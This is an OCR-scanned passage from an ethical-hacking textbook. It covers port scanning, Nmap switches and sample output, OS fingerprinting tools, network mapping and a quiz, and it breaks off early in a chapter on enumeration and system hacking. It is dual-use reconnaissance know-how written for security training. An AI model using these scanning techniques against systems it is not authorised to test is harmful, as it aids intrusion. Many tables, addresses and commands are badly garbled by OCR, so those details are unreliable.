Ls not without issue. First, it is not uncommon for network adminis- trators to specifically block ping at the firewall or even turn off ping completely on host devices. Second, it is a safe bet that any intrusion detection system I IDS I or intrusion prevention system (IPS) that is in place will detect and alert network managers in the event a ping sweep occurs. Finally, ping sweeps have no capability to detect systems that are plugged into the network but powered down. Remember, just because a pmg sweep doesn’t return any results, it does not mean that no systems are available. Ping could be blocked and/or the systems pinged may be off. Port Scanning The next step to take after discovering active systems is to find out what is available on the systems: in this case, a technique known as port scanning is used. Port scanning is designed to probe each port on a system in an effort to determine which ports are open. It is effective for gaining information about a host because the probes sent toward a system have the ability to reveal more information than a ping sweep can. A successful port scan will return results that will give a clear picture of what is running on a system. This is because ports are bound to applications. A discussion of port scanning can’t proceed without a clear understanding of some of the fundamentals of poris. In all, there are 65,535 TCP and 65,5 35 UDP ports on CHAPTER 6 Port Scanning TABLE 6-1 Common port numbers. PORT SERVICE PROTOCOL 20/21 FTP TCP 22 SSH TCP 23 Te 1 n Gt TCP 25 SMTP TCP S3 DNS TCP/UDP SO i i ^ i r*i HTTP TCP 110 POP3 TCP 135 RPC TCP 161/162 SNMP UDP 1433/1434 MSSQL TCP any given system. Each of these port n urn hers identifies a specilie process that is either sending or receiving information at any time. At first glance, it might seem thai a security professional wouid have to memorize all 65.000 plus ports in order to be adequately prepared, but this is not the case. In reality, only a few ports should ever be committed to memory, and if a port scan returns any ports that are not immediately recognizable, those port numbers should be further scrutinized. Some common port numbers are shown in Table 6-1. Contained in the list of common port numbers in Table 6-1 is an important detail located in the last column. In this column, the protocol in use is listed as either TCP or UDP (the same protocols discussed earlier when reviewing the TCP/IP suite of protocols). In practice, applications that access the network can do so using either TCP or UDP, based on how the service is designed. An effective port scan will be designed to take into account both TCP and UDP as part of the scanning process; these protocols work in different ways. TCP acknowledges each connection attempt; UDP does not, so it tends to produce less reliable results. \i FY I A complete list of all ports and their assigned services is available at http://www.iana.orgf assignmen t/port-n umbers . Memorizing all the ports available is not necessary and a pointless exercise; instead, it is worth knowing several of the common ports and looking up those that are suspicious or unusual. A good practice is to be able to access the list of ports at a site such as http://wwwJana.org in case an unfamiliar port appears on a scan. 144 PART 2 A Tech nieal Overview of H atk i n g TABLE 6-2 TCP fl; ag types. FLAG PURPOSE SYN Synchronize sequence number ACK Acknowledgement of sequence number FIN Final data flag used during the four-step shutdown RST Reset bit used to close an abnormal connection PSH Push data bit used to signal that data in this packet should be pushed to the beginning of the queue URG Urgent data bit used to signify that there are urgent control characters in this packet that should have priority A Closer Look at TCP Port Scanning Techniques TCP is a protocol that was designed to enable reliable communication, fault tolerance, and reliable delivery. Each of these attributes allows for a better communication mechEinism. but tit the same time these features allow an attacker to craft TCP packets designed to gain information about running applications or services. To better understand these attacks, a quick overview of fltigs is needed. Flags are bits L Jial are set in the header of a packet, each describing a specific behavior as shown in Table 6-2. A penetration tester or attacker with a good knowledge of these flags can use this knowledge to craft packets and tune scans to get the best results every time. TCP offers a tremendous capability and flexibility due to flags thai can be set as needed. E low . L \ it, [ ])[ ] Lhu i > jkh offer iJie same cnpnb-illtics. largely txvause <i\ Ihe nuvlianies ol the protocol itself. I ID Pea n bethoughtofasa fire-and-forget or best-effort protocol and, as such, uses none of the flags and offers noneofthe feedback that is provided with TCR I J DP is harder to scan with successfully; as data is transmitted, there are no mechanisms designed to deliver feedback to the sender. A failed delivery of a packet from a client to a server offers only an ICMP message as an indicator of events that have transpired. One of the mechanisms that port scanning relies on is the use of a feature known as flags. Flags are used in the TCP protocol to describe the status of a packet and the commu- nication that goes with it. For example a packet flagged with the FIN flag signals the end or clearing of a connection. The ACK flag is a signal used to indicate that a connection has been acknowledged. An XMAS scan is a packet that has all its flags active at once, in effect “lit up” like a XM AS tree. Some of the more popular scans designed for TCP port scanning include: • TCP connect scan — This type of scan is the most reliable but also the easiest to detect. This attack can be easily logged and detected because a full connection is established. Open ports reply with a SYN/ACK while closed ports respond with a RST/ ACK. 6 CHAPTER 6 Port Scanning TCP SVN scan — This type of scan is commonly referred to as half open because a full TCP connection is not established. This type of scan was originally developed to be stealthy and evade IDS systems, although most modern systems have adapted to detect it. Open ports reply with a SYN7ACK while closed ports respond with a RST/ACK. TCP FIN scan — This scan attempts to detect a port by sending a request to close a nonexistent connection. This type of attack is enacted by sending a FIN packet to a target port: if the port responds with a RST, it signals a closed porL This technique is usually effective only on UNIX devices, TCP NULL scan — This attack is designed to send packets with no flags set, The goal is to elicit a response from a system to see how it responds and then use the results to determine the ports that are open and closed. • TCP AC K scan — This scan attempts to determine access control list (ACL) rule sets or identify if stateless inspection is being used. If an ICMP destination is unreachable, the port is considered to be filtered. TCP XMAS tree scan — This scan functions by sending packets to a target port with flags set in combinations that are illegal or illogical. The results are then monitored to see how a system responds. Closed ports should return an RST, / \ Detecting Half-Open Connections Half-open connections can still be detected, but less easily than full-open scans. One way to detect half -open connections on Windows is to run the following command followed by the results: netstat -n -p TCP PROTOCOL LOCAL ADDRESS FOREIGN ADDRESS STATE TCP 10.150.0 237.177.154.8:25882 Established TCP io.iso.q .200:21 236.15, 133,204:2577 Establi shed TCP ie.i5i.ia .200:21 127.160. 6. 129:51748 Establi shed TCP 10.150.fl .200:21 236.220.13,25:47395 Established TCP le.ise.a ,200:21 227,200,204.182:60427 Established TCP ie.ise.ta .200:21 232.115. 18,38:278 Established TCP ie.ise.ia .200:21 229.116.95,96:5122 Established TCP ie.ise.ia .200:21 236.219.139.207:49162 Establi shed TCP io. iso. a .200:21 238.100.72,228:37899 Established The connections have- specifically been labeled with the text SYN_RECV # which indicates a half-open connection. Running this command in practice would be impractical, but the example does show that it is possible to detect ha If -open connections. 146 PART 2 A Technical Overview of Hacking Port Scanning Countermeasures Port scanning is a very effective tool for an ethical hacker or attacker, and proper co u nte rm e as u res should be deployed. These counter measures include the range of techniques utilized by an organization’s IT security group to detect and prevent successful port scanning from occurring. As there are a number of techniques that can he used to thwart port scanning, it would be impossible to cover them all, but listed here are some co u nte rm e as u res that prevent an attacker from acquiring information via a port scan: Deny all — Designed to block all traffic to all ports unless such iratlic has been explicitly approved • Proper design — A careful and well-planned network that includes security measures such as IDSs and firewalls • Firewall testing — Scanning a firewall is used to verify its capability to detect and block undesirable traffic, Port scanning — Utilizes the same tools that an attacker will use to Eittack a system with the goal of gaining a better understanding of the methods involved Security awareness training — An organization should strive to provide a level of security awareness within the organization. With proper seeurily awareness in place, personnel will know how to look for certain behaviors and maintain security. Security awareness will also be used to verify security policies and practices are being followed and to determine whether adjustments need to be made. Mapping Open Ports With scanning completed and information obtained, the next step of mapping the network can be performed. An attack in this stage has moved into a more interactive and aggressive format. There are many tools available that can be used to map open ports and identify services on a network. Because every tool cannot be covered, it is necessary to limit the discussion to those tools that are widely used and well known, No matter which tools are to be used, however, the activity here can be boiled down to determining whether a target Is live and then port scanning the target. Nmap Nmap is one of the most widely used security tools and a firm understanding of Nmap is considered a requirement for security professionals. At its core, Nmap Is a port scanner that has the ability to perform a number of different scan types. The scanner is freely available for several operating systems, including Windows, Linux. MacOS, and others. By design h the software runs as a command line application, but to make usage easier* ci graphical user interface (GUI) is available through which the scan can be configured. The strength of Nmap is that it has numerous command line switches to tailor the scan to return the desired information, The most common command switches are listed in Table 6-3. CHAPTER 6 Port Scanning table 6-3 Nmap options. MMAP COMMAND SCAN PERFORMED -sT TCP connect scan -sS SYN scan FIN scan -sX XMAS tree scan -sN NULL scan -sP Pino sea n -sU UDP scan -sO Protocol scan -sA ACK scan -sW Windows scan -sR RPC scan -sL List/DNS scan -si Idle scan -Po Don’t pinq w-r w i i i_ |_r i i i «y -PT TCP ninn ■ n— ■ i_r i i i u -PS SYN Dina _r 1 ■ V B— r ■ 1 1 h_gl -PI It” MP oina -PB TCP and (CM P ping ] -PB ICMP ti mestannD ■ llrll L 1 1 I 1 ^ “L.^J III -PM ICMP netmask -oN Normal out out -oX XML outout -oG Greooable outout -oA All OUtDUt J L ■ ■ n_r 1—1 LLr ■_ -T Paranoid I 1 U J 1— 1 1 1 1_f 1 ■— H r S 1 3 1—1 I F S U 1 1 j r l_r l_r _F H h_ l_r S_ l_ ■ r H_ ■ 1 1 JhuU 1 1 J -T Sneaky Serial scan; 15 sec between scans -T PoSite Serial scan; .4 sec between scans -T Normal Parallel scan -T Aggressive Parallel scan -T Insane Parallel scan 148 PART 2 A Technical Overview of Hacking To perform an Nmap scan, at the Windows command prompt, type Nmup IP address, followed by the switches that are needed to perform the scan desired. For example, to scan the host with the IP address 1 92.1 68. 123.254 using a full TCP connecting scan type, enter the following at the command line: Nmap -sT 92. 168. 123.254 TJk i response will be similar to this: Starting Nmap 4.62 (http://nmap.org) at 2010-03-21 10:37 Central Daylight Tine Interesting ports on 192 . 168. 123 . 1 54 : Not shown: 1711 filtered ports PORT STATE SERVICE 21/tcp open ftp S0/tcp open http 2601/tcp open zebra 2602/tcp open ripd MAC Address: 00: 16 :01 :D1 :3D: SC (Linksys) Nmap done; 1 IP address (1 host up) scanned in 113.750 seconds These results are providing information about the victim system, specifically the ports that are open and ready to accept connections. Additionally, since the scan was performed against a system on the local network, it also displays the media access control I MAC) address of the system being scanned. The port information can be used later to obtain more information as wilt be explored later N map’s results can display the status of the port in one of three states: • Open — The target device is accepting connections on the port. • Closed — A closed port is not listening or accepting connections, » Filtered — A firewall, filter, or other network device is monitoring the port and preventing full probing to determining its status. H FYI i One of the more common types of scan is a full TCP connection scan £-sT) because it completes all three steps of the TCP handshake. While a full connect scan is the most common, a stealth scan is seen as more covert because only two steps of the three-step handshake are performed. One of the techniques to perform a somewhat stealthy scan is a SYN scan which only performs the first two steps. This type of scan is also known as ” half open” scanning as it does not complete the connection. CHAPTER 6 Port Scanning 149 5ci | HwJ and5tiwc« DtKOvCfj^ | 5ci0p*iora | Tods | Wnfcws E numefotion | About | IPr HoUfumAP |-.*216S.1212:-: Start IF X|| m 163 . 123 ErteilP X]| 142 . Itt .123 254 SlallP ErKil? Do* At H*f ciuat : EU&knov&l TCP jwira IS) 21,60, SIS Tccal JLi-V* hosts nc<jv^nr»d TotB.1 op n. TCP ports tbt*i ap«n MPT per** i i 2 PcxtocmlTi? honniu Earalisticn. . V«i forainv Finnic grab*. . . TCP bimwi grabbing 13 porifl bkrtmi grabbing 12 por**l Alport mg 5 run iifulti… S<*n dmi Dieevry f ia&ifctd: limn iii»iJiiii|iiiiii|t|||||tit|||||tllllllllllllllll1lfl«ltlfltI»iiiililiilti 00: 21 Savad Icmj lite Lava: 1 TCP od«i: 3 JDP open: 2 1/1 dona FIGURE 6-1 Superscan. Superscan Superscan is a Windows-based port scanner developed by Foil tut stone. This port scanner is designed to scan TCP and UDP ports, perform ping scans, run Whois queries, and use tracert. Superscan is a GUI-based tool that has a prec on figured list of ports to scan or can be customised Lo scan a specific range. It’s shown in Figure 6-1, Scanrand [ ; NOTE Scanrand is a scanning tool that is designed to scan a single host up to large-scale networks quickly and then return results about the network. Scanrand is unique among network scanners because although most scan a port at a time, Scanrand scans ports in parallel using what is known as stateless scanning. By using stateless scanning, Scanrand can perform scans much faster than other network scanners. St Lite less scanning is an app roach to scanning I hat splits scanning into two distinct processes. The two processes work together to complete the scanning process with one process transmitted and the other listening for results. Specifically, the first process transmits connection requests at a high rate, and the second process is responsible for sorting out the results, The power of this program is a process known as inverse SYK cookies, Scanrand is available for both the tinux and UNIX platforms; there is no Windows equivalent. 150 P A RT 2 A Tech n i ca I Overview of H ack i ng Scanrand builds a hashed sequence number that isphiced in the outgoing packet that can be identified upon return. This value contains information that identifies source IP, source port, destination IB and destination port Scanrand is useful to a security professional when a Large number of IP addresses need to be scanned quickly, THC-Amap THC-Amap (Another Mapper) is a scanner that offers a different approach to scanning. When using traditional scanning programs, problems arise when services thai use encryption are scanned, because these services might no! return a banner, due to the fact that certain services such as the Secure Sockets Layer (SSL) expect a handshake, Amap handles this by storing a collection of normal responses that can be provided to ports to elicit a response. The tool also excels at allowing the security professional to find services that have been redirected from standard ports. OS Fingerprinting Open ports that have been uncovered during the port scanning phase need to be further investigated because the mere existence of an open port does not mean vulnerability exists; this must still be determined. The open ports that are discovered provide clues to what operating system is in use on the target. Determining the operating system that is in use on a specific target is the purpose of what is known as OS fingerprinting. Once an operating system is identified L it is possible to better focus the attacks that come later, To identify an OS. there are two different methods that can be utilized: active fingerprinting or passive fingerprinting, OS linger printing relies on the unique ebaracierisl ics 1 bin each OS possesses lo function. Each operating system responds to communication tit tempts in different ways that, once analyzed, can allow for a well-educated guess to be made about the system in place. To seek out these unique characteristics, active and passive fingerprinting can probe a system to generate a response or listen to a system’s communications for details tihoul the OS. H ™ ■ ; There are literally untold numbers of techniques available to use in an attack. In some cases, these techniques are specific to an operating system due to the vulnerability involved such as a design flaw in the OS or a software defect. When an attack is meant to be used against a specific OS, it would be pointless to unleash it against a target that is not vulnerable, which would both waste time and risk detection. NOTE THC-Amap is similar to Nmap in that it can identify a service that is fistening on a given port. Amap does not include the extensive identification abilities possessed by Nmap,, but it can be used to confirm results of Nmap or to fill in any gaps. CHAPTER 6 Port Scanning Everything Has a Price Active OS fingerprinting has advantages that make it an attractive option, at least on the surface. The process generally does not take as long to identify a target because the attacker requests information instead of waiting for it, as in passive fingerprinting. While performance is a benefit, the downside is that the process of active fingerprinting has a much higher chance of revealing the attack. It is more than likely that the process of active fingerprinting will trigger defensive counter measures such as IDS and firewalls, which will respond by alerting the network owners about the attack and shutting it down. Does this mean active fingerprinting is a bad idea? Not necessarily — there is a time and place for it, and knowing when to use active methods and how aggressively to use them is important. Active fingerprinting, for example, is an ideal mechanism to scan a large amount of hosts quickly, but the danger of being detected and stopped still exists. Active 05 Fingerprinting The process of active OS fingerprinting is accomplished by sending specially crafted packets to the targeted system. In practice, sever til probes or triggers Eire sent from the scanning system to the target. When the responses are received from a targeted system, based on the responses Ein educated guess can be made as to the OS that is present. Though Li may uppcnr otherwise. OS identification is tin iKViiraic 1 mcLtnn’ ul” detmuming the system in pi Lice because the tools have become much more accurate lhan in the past. Xprobe2 Xprobe2, a commonly used active fingerprinting tooL relies on a unique method to identify an operating system known as fuzzy signature matching. This method consists of performing a series of tests against a certain target and collecting the results. The results are then analyzed to a probability thcit a system is running a specific OS. X pro be 2 cannot say definitively which operating system is running, but instead uses the results to infer what system is running. As an example, running Xprobe2 against a targeted system yields the following results: 75% Windows 7 20% Windows XP 5% Windows 3B The results that Xprohe2 is presenting here are the probability that the system is running a given OS. Xprobel comes with several predefined profiles for different 0$S t and the
results are compared against these profiles to generate the results seen here. The results
show that (here are three fXSs that match profiles to different degrees: The results for
Windows 7 are at 75 percent and the others are quite low, so it can be assumed with
some confidence that Windows 7 is in place. This score is intended to determine which
operating system the target computer is running.

152 PART 2 A Technical Overview of Hacking

Which Method Is Better?

Nmap can be used with or without a GUI, and ii is up to the individual users to determine
which is best for their own particular style. For those who are not comfortable with
the command line, the GUI is a great way to learn and get acquainted with what the
command line switches look like for specific operations. The Zen map GUI is a front end
for Nmap that makes the product easier to use while allowing the operator to see what
the command line looks like. Consider using Zenmap to start; then use the command line
once a comfort level is achieved with the commands.

Nmap

Valuable in OS fingerprinting as well as port scanning. Mm tip can provide reliable data on
which operating system is present. Nmap is effective at identifying the OKs of networked
devices and generally can provide results that are highly accurate. Several Nmap options
that can be used to fine-tune the scan include:

• -sV Application version detection

• -O OS fingerprinting

• -A Both of the previous options

An example of an Nmap scan with the -O option is shown here:
Nmap -0 192. 168. 123.254

Starting Nmap 4.62 (http://nmap.org) at 2010 -03- 2 1 12:09 Central
Daylight Time

Interesting ports on 192. 168. 123 . 22:

Not shown: 1712 closed ports

PORT STATE SERVICE

SO/tcp open http

2601/tcp open zebra

2602/tcp open ripti

Device type: general purpose
Running: Linux 2.4.X

OS details: Linux 2.4 , 1S-2 .4.32 (likely RedHat)
Uptime: 77.422 days (since Sun Jan §3 01:01:46 2010)
Network Distance: 1 hop

CHAPTER 6 Port Scanning

Nmap has identified this system as Linux along with version and up lime information.
An attacker gaining this information can now target an attack to make it more effective
because it would be possible to focus on only those exploits that are appropriate — for
example, no Windows attacks, Nmap is capable of identifying commonly encountered
network devices and is a tool that should not be overlooked.

Passive OS Fingerprinting

The alternative to active fingerprinting is passive fingerprinting, which approaches the
process differently. Passive fingerprinting, by design, does not interact with the target
system itself, It is a passive tool that monitors or captures network traffic. The traffic
monitored is analyzed for patterns that would suggest which operating systems are in use.
Passive OS fingerprinting tools simply sniff network traffic and then match that traffic
to specific OS signatures. The database of known patterns can be updated from time to
time as new operating systems are released and updated. As an example* a tool may have
a jinger print for Windows Vista but will need to be updated to include Windows 7.

A passive identification requires larger amounts of traffic, but offers a level of stealth,
as it is much harder to detect these tools, since they do not perform any action that
would reveal their presence. These tools are similar in that they examine specific types
of information found In IP and TCP headers. While you do not need to understand the
inner workings of TCP/IP to use these tools, you should have a basic understanding
as to what areas of these headers these tools examine. These include;

• TTL Value

• Don’t Fragment Bit (DF)
■ Type of Service (TOS)

• Window Size

The pOf Tool

A tool for performing passive OS linger printing is a tool named p£]f, which can identify
an OS using passive techniques. That means pOf can identify the target without placing
any additional traffic on the network that can lead to detection. The tool makes attempts
to fingerprint the system based on the incoming connections that are attempted.

Patience Is a Virtue

While passive OS fingerprinting generally does not yield results as quickly as active OS
fingerprinting, there are still benefits. Passive OS fingerprinting allows an attacker to obtain
information about a target without triggering network defensive measures such as IDS
or firewalls. While the process may take longer than .active fingerprinting, the benefit
is that the victim has less chance of detecting and reacting to the impending attack.

Remember: Active fingerprinting contacts the host; passive fingerprinting does not.

154 PART 2 A Technical Overview of Hacking

Are We There Yet?

The results of the scanning process shown here can be misleading because it is possible
that pOf will not be able to identify a system for a number of different reasons, tn such
events, pOf will return results that will state “unknown” for the operating system instead
of an actual OS. In these cases, it may be necessary to try another passive tool or switch
to active methods to determine the OS.

The following results have been generated using pOi:
C:\>p0f -il

pOf -passive os fingerprinting utility, version 3.0.4

(C) M . Zalewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com>

WIN32 port (C) M. Davis <mike@datanerds.net>, K. Kuehl <kkuehl@cisco
. com>

p0f: listening (SYN) on p \Device\NPF_;Ml34627-43B7-4FE5-AF9B

2 sigs (12 generic), rule: ‘all’.

1. 123.254: 1045-Linjx RedHat

Once pOf is running, it will attempt to identify the system that is being connected to.
based on the traffic that it observes. The previous example shows that pOf has identified
the system in question as being a distribution of Linux known as RedHat.

NOTE

The tools in this category were
designed to help those who create
networks manage them. However,
as with most tools, the possibility for
abuse exists. As is true in most cases,
the tool isn’t evil or bad; it’s the
intention of the user that actually
determines whether honorable
or tess-than- honorable actions
will be the result.

Mapping the Network

The next step in the process is to generate a picture of the
network that is being targeted. When the information has
been collected and organized, a network diagram can be
produced that will show vulnerable or potentially vulnerable
devices on the target network. A number of network
management tools can produce an accurate map of the
network built of information that has been gathered previ-
ously in addition to new information. Some tools that can
help in the process include SolarWinds Toolset, Cheops,
Queso, and Harris Stat.

CHAPTER 6 Port Scanning

155

Even without these tools, you should be able to manually map your li ridings. This
information can be recorded in a notebook or a simple spreadsheet. This spreadsheet
should contain domain name information, il’ addresses, domain name system (DNS)
servers, open ports, OK version, publicly available IP address ranges, wireless access
points, modem lines, and application banner details you may have discovered,

Cheops

Cheops is an open source network management tool lhat can assist in viewing the
network layout and the devices therein. Cheops can assist an attacker in the same way
it would assist a network admin — it performs tasks such as identifying hosts on a network
and the services each offers. Even more useful is the ability to display the whole network
in a graphic format showing the paths of data between systems on the target network,

Solarwinds

Solarwinds is another network management tool that can be used to render a diagram
of a network and the services within. Solarwinds has the ability to detect, diagram,
and reflect changes in the network architecture with a few button clicks. It is even
possible for Solarwinds to generate network maps that can be viewed in products such
as Microsoft’s diagramming product Visio.

Analyzing the Results

With a wealth of data on hand, the attacker now must undertake the process of
of the i T ictim and identifying potential points of entry require careful analysis and
organization. At this point, the attacker starts to plan the attack. When analyzing data,
for example, items such as an open wireless access point can lead a hacker to consider
additional ward riving or wireless attack activities in an attempt to connect to the
network. Another example is an unpatched Web server that would present the hacker
an opportunity to run an attack against the server itself. Generally, these steps would
be the following:

• Analyze the services that have been revealed,
• Explore vulnerabilities for each service or system.

• Research and locale any potential exploits that can be used to attack the system.

• Once each of these items has been completed, the attacker can now use a search
engine lo gather inform til Ion ahoul pou-nllaJ attacks h\ searching Lhe OS and exploits.
Plenty of information is available for an attacker to learn how to position an attack,
One example, http://www.securitiffocus.com. was searched for vulnerabilities for Windows
Web server IIS version 5. The results are shown in Figure 6-2. Notice that there are more
than three pages of results.

156 PART 2 A Technical Overview of Hacking

VUlner-aEdities (Pag* J cf 3) t 2 3 Mast >

Vendor MfcSGSon *

Title:

IIS

VerttioriJ

SO

u

Search by CV£

CSEs

■ ii’rinrni rr i inniirr’ – – ■ ■ ■-■ ■ ■ ■ ■ ■ ■ ——– . … . . ■ r . . . – P . nBBrln ^ – , , Tr mirr- i-> nr » iiirniin’7rii”ii”!iirm’r!i”ininiTi ■ frniii

RETIRED: Microsoft EI B Walt pniicd Local Filename Security Bypass Vuhicrabilty

Microsoft IIS FTPrJ ML ST Rerhofcc Buffer 1 Overflow Vuhterabil ity

http://w«w wcL’itv f ocus com/bd/’36 1 89

Microsoft IIS FTPrl blobbing Functionality Remote Dcsninl of Service ViJnernhaity
RETIRED! Microsoft IISFTPd Globbing Funciioiidlity RtinuLt; Dental of St:rvk*5 VulnerabilitV

Microsoft Coifiboratkni Da La objects Remote UuEfer Overflow Vdnerabilitv

http-: //www. j*c^tyfe>CLis.coiTi 1 /bdl/ 1 5067

Microsoft Xffl. Parser Remote Dental of Service vulnerability

20M-07-JS

bttp : //vrtww.aeojitvfoojs.com.i’btd/L 1 3S4

FIGURE 6-2

Microsoft IIS vulnerabilities,

It is Ett this point that the reasons for patiently and thoroughly collecting information
about a target become clear. With the results of previous scans, maps, and other data
gathered, a target can be more accurately pinpointed resulting in a more effective and
potentially devastating attack.

CHAPTER 6 Port Scanning

CHAPTER SUMMARY

This chapter introduced the concept of port scanning, Port scanning is a technique
that is used to identify services present on a system or range of systems. The purpose
of port scanning is to get a better idea of what is present and running on a target
the services that are available on a system, several techniques can be used, including
wardrning. wardialing, and piny sweeps. Once services have been identified and
eon firm ed> the next step is to learn about the operating system to better target
the attack it sell’

There are two ways to determine the OS: active and passive fingerprinting,
Active lingerprinting iden lilies a system or range of systems by sending specially
cral’ted packets designed to reveal unique characteristics aboul the target .The
downside of this type of lingerprinting is that the process can be easily detected.
Active lingerprinting tools include Nmap and Xprobe2. The alternative to active
lingerprinting is passive iinytTpriniing, which is sleaUhier. but is not as accurate.
One of the best passive fingerprinting tools is pOf.

The attacker will then move on to mapping the network to determine the nature
and relationship of I he hosts on the network. Network mapping reveals the nature
and relationship of the network in a graphical format, allowing lor a better view
of the network. Network mapping is one of the last steps before choosing an attack.

Once applications have been mapped and operating systems identified, the attack
moves lo the final sleps, which include mapping the network and analyzing the
results. An attacker lhat has obtained in formal ion about services is very close to
being able to launch an attack, Asa security professional, your goal is to find these
problems and lix them before the hacker can exploit these findings.

KEY CONCEPTS AND TERMS

Active fingerprinting OS identification

Banner Passive fingerprinting

Internet Control Message Ping sweep
Protocol (ICMP)

1 58 PART 2 A Technical Overview of Hacking

Li

CHAPTER 6 ASSESSMENT

1. . is a popular I hough easily delectiible

scantling technique.

A, Full connect

II, Half open scanning

C. NULL scan

D. XttidS Lfte scan

1. Which of the following is the Nmap command
line switch for a full connect port scan?

A. -sS

B. sU

C. -sT

d. -o

1. Which of the following is an example
of a passive fingerprinting tool?

A. Superscan

B. Xprobc2

C. Nmap
11 pOf

1. TCP and I J DP birth use [lags,

A. True
\L False

1. Which of the following statements Is most
correct/ 1

A. Active fingerprinting tools Inject packets
into ilir network.

B. Passive fingerprinting tools inject traffic
Into the network.

C. Nmap can be used for passive fingerprinting.

D. Passive fingerprinting tools do not require
network traffic to fingerprint an operating
system.

1. Which of the following is not a network
mapping tool:

A. SoLarwinds

B. Netstat

C. Cheops

D. Harris St at

1. l he poim al which an a I Lacker

starts to plan his or her attack.

A. Active OS fingerprinting

B. Passive OS fingerprinting

C. Port scanning

D. Analyzing the results

&. A XMA& tree scan sets all of the following
Hags except .

A. SYN

B. URG

C. PSH

D. FIN

1. Of the two protocols discussed, which is more
difficult to scan for?
• You have been asked to perform a port scan
for POPS. Which port will you scan for?

• A. 22

B. IS

C. 69
IX I 10

1 1 . Ping scanning does not identify open ports.

A. True

B. False

1. The processof determining the underlying
version of the system program being used
is best described as .

A. OS fingerprinting

B. Port scanning

C. Wardiallng
IX Wardrivlng

1 5. Which of the following switches is used
for an ACK scan?

A. ^sJ

B. ^sS

C. ^sA
11 -sT

Enumeration and ^
Computer System Hacking

CHAPTER

WITH THE INFORMATION collected up to this point, an attacker has a
better picture of what the environment targeted looks like. What the
attacker doesn’t know, however, is what the system is actually offering.
To determine what a system is offering is the goal of a process of enumeration.
Enumeration takes the information that has already been carefully gathered
and attempts to extract information about the exact nature of the system itself.

Enumeration is the most aggressive of the information gathering processes
seen up to this point. Up to this point, information has been gathered without
interacting to a high degree with the target In contrast, with enumeration,
the target is being interacted with and is returning information to the attacker
Information extracted from a target at this point includes usernames r group
info, share names, and other details.

Once enumeration has been completed, the process of system hacking can
begin. In the system hacking phase, the attack has reached its advanced stages
in which the attacker starts to use the information gathered from the previous
phases to break into or penetrate the system.

After the enumeration stage, the attack has begun, and the attacker runs
code on the remote system. The attacker is now placing software or other items
on a system in an effort to maintain access over the long term. An attacker
places backdoors to leave a system open for repeated usage in attacks or other
activities as needed.

Finally, attackers cover up their tracks to avoid detection and possible
countermeasures later. In this last phase, attackers make an effort to eliminate
the traces of their attack as completely as possible, leaving few r if any,
traces behind.

159

Chapter 7 Topics

This chapter covers the following topics and concepts:

• What some basics of Windows are
• What soine commonly attacked and exploited services are

• What enumeration is

• What system hacking is

• What the types of password cracking are
» How attackers use password cracking

• How attackers use PsTools

• What rootkits are and how attackers use them

• How attackers cover their tracks

• Chapter 7 Goals

When you complete this chapter, you will be able to:

• Explain the process of enumeration
• Explain the process of system hacking

• Explain the process of password cracking

• Identify some of the tools used to perform enumeration
Understand the significance of privilege escalation

• Explain how to perform privilege escalation

• Explain the importance of covering tracks

• Explain how to cover tracks

• Understand the concept of backdoors

• Explain how to create backdoors

• Windows Basics

The Windows operating system can be used as both a stEind alone and a networked
operating system , but for the purposes of this chapter you will consider mostly the
networked aspects of the operating system (OS), It is important to consider what needs
to be secured Eind how to secure the operating system in the networked environment.
One of the big issues of securing Windows in the networked environment is the sheer
number of features that must be considered and locked down to prevent exploitation.
However, before we can determine what to secure, we need to know how Windows works.

CHAPTER 7 En time ration and C omputer System Hacking

161

Controlling Access

One of the first things that must be understood prior to securing
Windows is how access to resources such as file shares and other
items is managed. Windows uses a model that can be best summed
up as defining who gels access lo what resources. For example,

Always consider what a user
account will be used for,
because that well dictate
what privileges it needs and
what ones it doesn’t. For
example, if a user will never

Users

In Hie Windows OS, the fundamental object lhat is used to

determine access is the user account. User accounts are used in
Windows to access everything from iiles shares to run services that
keep the system functioning. In fact, most of the services and processes that run on
the Windows operating system run with the help of a user account, but the question
is< w r h ich one. Processes in Windows are run under one of four user contexts:

• Local Service — A user account with greater access to the local system,

Network Service — A user account with greater access to the network,

• SYSTEM — A super-user style account that gets nearly unlimited access to the local
system and can perform actions on the local system with little or no restriction

• Current User — The currently logged-in user who can run applications

and tasks, but still is subject to restrictions that other users are not subject to.
The restrictions on this account hold true even if the user tic count being used

Each of these user accounts is used for different specific reasons, and in a typical
Windows session each is running different processes behind the scenes to keep the
s y stem per form i n g.

Prior to the introduction of Windows XP r all system services ran under the SYSTEM account,
which allowed all the services to run as designed, but also gave each service more access than
it needed. With each service running with what was essentially no restrictions, the potential
for widespread harm if a service was compromised was unacceptable. Starting in Windows XP
on up to the current version of Windows system, services run under an account with the
appropriate level of access lo perform their tasks and none of the extra access that could be
a hazard. As will be seen later, this setup limits the amount of damage an attacker could
cause if a service were compromised.

1 fyi

162

P A RT 2 A Tech nical Overview of H ack i ng

table 7-1 SAM changes in Windows.

NAME

LAN Manager (LM)

NT LAN Manager
(NTLM)

Kerberos

EARLIEST WINDOWS
VERSION SUPPORTED

Windows for
Workgroups

Windows NT
Windows 2000

DESCRIPTION

Considered weak due to the way
hashes are created and stored

Stronger than LM, but somewhat
similar

Available with Active Directory

NOTE

Remember that the
SAM is a file that
physically resides on
the hard drive and is
actively accessed while
Windows is running.

User ei c count information can be physically stored in two
locations on a Windows system: in the SAM or in Active Directory.
The Security Account Manager (SAM) is a dm abase on the local system
that is used to store user account information, By default, the SAM resides
within the Windows folder % W IK NT% \sy s tem 3 2 \co n li g\s a m . This
is true of all versions of Windows clients or servers. The other method
of storing user information is in Active Directory, which is used in larger
network environments such as those present in mid- to enterprise-level
businesses. For simplicity, this chapter will not discuss Active Directory.
Inside the SAM are a few items that should be covered prior to moving forward with
other features: namely, some of the storage details that occur here. The SAM stores
within it hashed versions of users 1 passwords used to authenticate user accounts; these
hashes are stored in a number of different ways depending on the version of Windows,
The hash details are listed in Table 7-1 ,

Groups

Groups are used by Windows to grant access to resources and to simplify management
Groups are effective administration tools that enable management of multiple users
because a group can contain a large number of users that can then be managed as a unit.
By using groups, you can assign access to a resource such as a shared folder to a group
instead of each user individually, saving substantial time and effort. You can configure
your own groups as you see fit on your network and systems, but most vendors such as
Microsoft include a number of predefined groups that you can usl- lis well or modify as
needed. There are several default groups in Windows, discussed in the following list:

• Anonymous Logon — Designed to allow anonymous access to resources: typically
used when accessing the Web server or Web applications

• Batch — Used to allow batch jobs to run schedule tasks, such as a nightly cleanup
job that deletes temporary files

CHAPTER7 En time ration and C omputer System Hacking

163

Creator Group — Windows 20(10 uses ihis group to automatically grant access permis-
